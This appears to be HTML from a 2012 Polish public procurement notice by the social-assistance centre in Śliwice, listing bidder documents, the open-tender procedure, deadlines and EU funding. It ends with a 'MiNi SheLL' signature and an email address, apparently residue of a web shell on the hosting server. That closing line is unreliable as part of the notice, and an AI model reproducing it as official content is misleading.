<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.Sytuacja ekonomiczna i finansowa
Opis sposobu dokonywania oceny spełniania tego warunku
Złożone oświadczenie - Załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty 
Formularz ofertowy  załącznik Nr 1 do SIWZ
Wykaz części zamówienia, które Wykonawca zamierza powierzyć podwykonawcom załącznik nr 5 do SIWZ, w przypadku gdy wykonawca zamierza powierzyć część zamówienia podwykonawcom.
Pełnomocnictwo jest wymagane w przypadku gdy do reprezentowania Wykonawcy upoważniony jest pełnomocnik lub jeżeli oferta składana jest przez podmioty występujące wspólnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.sliwice.pl , www.gops-sliwice.las.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać pod adresem: Gminny Ośrodek Pomocy Społecznej, ul. Ks. Sychowskiego 28, 89-530 Śliwice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.07.2012 godzina 10:00, miejsce: Miejsce: Gminny Ośrodek Pomocy Społecznej, ul. Ks. Sychowskiego 28, 89-530
Śliwice, biuro nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013, Priorytet VII - Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1.- Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej oraz ze środków budżetu Gminnego Ośrodka Pomocy Społecznej w Śliwicach.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com